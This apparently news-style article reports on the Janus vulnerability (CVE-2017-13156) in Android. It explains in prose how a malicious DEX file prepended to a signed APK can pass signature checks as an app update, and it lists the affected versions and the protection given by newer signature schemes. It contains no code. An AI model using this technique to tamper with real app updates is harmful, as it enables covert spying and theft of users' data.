A serious new vulnerability has been found in Android which allows hackers to hack your smartphone. They can Modify the android application code without affecting their signature.
This vulnerability in the Android is unstable for the Android smartphone. The primitive problem is that the file can be valid APK file and a valid DEX file at the same time. According to the bulletin, the vulnerability is named as “Janus vulnerability” which is named after the Roman god of duality.
Although Android applications are self-signed, signature verification is the primitive importance given when updating the android applications. But while downloading the updated version of the Android application, is it safe? is the first question user should ask themselves. But we don’t. Neither the user cares the guide specification of their Android nor the security while updating the applications. When the user downloads an update of an application, the Android system runtime compares its digital signature with the signature of the original version. If the signatures match, the Android runtime proceeds to install the updates”, Guard Square researchers explained.
The updated application in the system inherits all the possible permission from the systems original application. At this instant, attackers can use ‘Janus vulnerability’ to mislead the update process and extract the important codes, permissions and even install the bugs to continue eavesdropping on the unsuspecting users Android system.
The vulnerability (CVE-2017-13156) can be exploited in all possible method such as replacing the existed app permission, getting access to the valuable data like passwords, phonebooks, messages, modification of the app including the system app, preventing the installation of the app, etc. without giving a notice to the user.
It begins with the addition of extra bytes to APK files and to the DEX files. Although, an APK is a zip archive, which can include arbitrary bytes at the start, before its zip entries. Also, the JAR signature system only takes account zip entries into the consideration which ignores any extra bytes when computing or verifying the application’s signature.
Similarly, DEX file can also include arbitrary bytes at the end, after the regular sections of strings, classes, method definitions, etc which concludes that the file can be both a valid APK and a valid DEX file at the same time.
In this method execution done by the system, the virtual machine can load and execute these both APK files and DEX files. It is designed and trained in such a way that when it gets the file, it only focuses on the header of the file to decide whether it is DEX file or APK file. When it finds DEX header, it loads the file as a DEX file otherwise loads the APK file which contains entries with a DEX file. Hence it can be misinterpreted with dual DEX/APK files.
This advantages can be earned by the attackers prepending a malicious DEX file to an APK file without affecting its signature which will be accepted by the system as a valid update of a legitimate version of the app which is not and ends up with the injected DEX file.
This Janus vulnerability affects the Android devices version 5.0 “Lolipop” and newer. APK signature scheme v2 sign application and running on the devices with latest signature scheme i.e Android 7.0 and newer are protected against it.
It is not sure that the vulnerability has gone wild in the market. However, it is safe to download any application or updates directly from the Google Play, indicated by researchers.